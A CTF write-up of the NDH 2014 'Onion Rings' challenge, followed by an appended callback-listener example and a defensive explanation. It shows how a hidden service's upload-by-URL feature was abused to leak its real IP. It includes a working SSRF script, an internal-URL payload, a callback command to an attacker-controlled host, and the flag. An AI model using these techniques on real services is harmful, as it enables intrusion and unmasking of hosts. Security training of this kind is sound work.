@Sliim
Last active August 29, 2015 13:58
Onion Rings Writeup - NDH 2014 Prequals

A new black market has appeared and has been targeted by the FBI.
After checking for suspicious posts on stackoverflow and finding
nothing, they give up and are offering a bounty to anyone who can
get information on the server that is hosting the hidden service.

Link    http://mq72g4732yorslzf.onion/

OK, the server is on a .onion domain! Let's go: set up the Tor proxy and connect to the hidden service, the Black Market! First, we discover the home page of this market, which contains useful things :D.

http://sliim-projects.eu/writeup/ndh2k14-black-market/01-home.png

There is a button at the top right of the home page that points to an upload page, http://mq72g4732yorslzf.onion/upload.php. The user can either upload an image from their computer or specify the URL of an image.

OK, let's validate the form with this URL: http://3l1t3h4x0r.com/haxor.gif

http://sliim-projects.eu/writeup/ndh2k14-black-market/02-upload.png

After the form is submitted, we are redirected to the same upload.php page and the image is displayed at the bottom of the page.

http://sliim-projects.eu/writeup/ndh2k14-black-market/03-uploaded.png

OK, so where is the uploaded image stored? Let's take a look at the HTML source:

<img src="data:image/gif;base64,R0lGODlhpQ[...]MKAIRAAA7"/>

We can see at the end of the HTML source that the image isn't stored as a file but is displayed inline as base64 data. OK, there is something here :). I therefore wrote a little script to submit a URL and read back the base64 data:

""" Usage:
This script must be run in tor proxy to access onion target!
It take 1 argument, that is the url where will be uploaded image and print HTTP response

$ proxychains python upload-black-market.py "http://127.0.0.1/flag.txt"
"""

import sys, re, base64
import httplib, urllib

data = urllib.urlencode({"url": sys.argv[1], "upload": "Upload"})
h = httplib.HTTPConnection('mq72g4732yorslzf.onion:80')

headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}

h.request('POST', '/upload.php', data, headers)
r = h.getresponse()

b64 = re.search("(?<=base64,)(.*)\"", r.read()).group(1)

print b64
print base64.b64decode(b64)

After multiple attempts to find something interesting, another member of my team helped me..

  • Hey, and if you give it a URL to your own server you can get the IP of the fetcher..
  • Oh yeah! Why didn't I think of that earlier!!

So:

$ proxychains python upload-black-market.py "http://myserv.com/black-market"

And in my logs:

212.83.153.197 - - [05/Apr/2014:18:20:48 +0200] "GET /black-market HTTP/1.1" 403 439 "-" "-"

Thanks jpic!! :)

We can find the flag at http://212.83.153.197

He started screaming at me saying weird shit I didn't understand, then he just looked blank
and mumbled: "The flag .. The flag.. It is '0hSh1t1r4n0ut0fn00dl35'." And then he just died in
front of me.
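The deanonymization above works because the hidden service fetched the submitted URL directly from its clearnet address instead of through Tor, so the first hit in the attacker's web server log reveals the real host. As an added example (not part of Sliim's write-up), the block below shows the two pieces a practitioner would script for this: a tiny "callback" listener that records the source address of every request it receives, and a parser for an Apache/nginx-style access-log line like the one in the write-up. The `demo()` function is an assumption for offline use: it binds the listener to 127.0.0.1 and plays the role of the fetcher itself; in a real engagement you would bind to a public interface and submit `http://<your-host>:<port>/anything` to the upload form.

```python
import http.server
import re
import threading
import urllib.error
import urllib.request
from datetime import datetime

# Common/combined log format: host ident authuser [date] "request" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_access_line(line):
    """Return (ip, timestamp, request, status) for one access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
    return m.group('ip'), ts, m.group('req'), int(m.group('status'))


class CallbackHandler(http.server.BaseHTTPRequestHandler):
    """Records who connected and answers 403: the hit itself is the data, not the body."""
    hits = []  # shared list of (client_ip, path, user_agent)

    def do_GET(self):
        CallbackHandler.hits.append((self.client_address[0], self.path,
                                     self.headers.get('User-Agent', '-')))
        self.send_response(403)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep stdout quiet; hits[] is the record


def start_listener(host='127.0.0.1', port=0):
    """Start the callback server on a background thread; returns (server, bound_port)."""
    srv = http.server.HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo():
    """Assumed local stand-in for the fetcher: hit our own listener and return the recorded hit."""
    srv, port = start_listener()
    try:
        try:
            urllib.request.urlopen(f'http://127.0.0.1:{port}/black-market')
        except urllib.error.HTTPError:
            pass  # the 403 is expected; the listener already logged the source address
    finally:
        srv.shutdown()
    return CallbackHandler.hits[-1]


if __name__ == '__main__':
    # The log line from the write-up: the fetcher's source IP is the hidden service's real host.
    print(parse_access_line('212.83.153.197 - - [05/Apr/2014:18:20:48 +0200] '
                            '"GET /black-market HTTP/1.1" 403 439 "-" "-"'))
    print(demo())
```

The defensive reading is the same in reverse: a hidden service that fetches user-supplied URLs must route those fetches through Tor (or refuse them), because any direct outbound connection hands the requester its clearnet address.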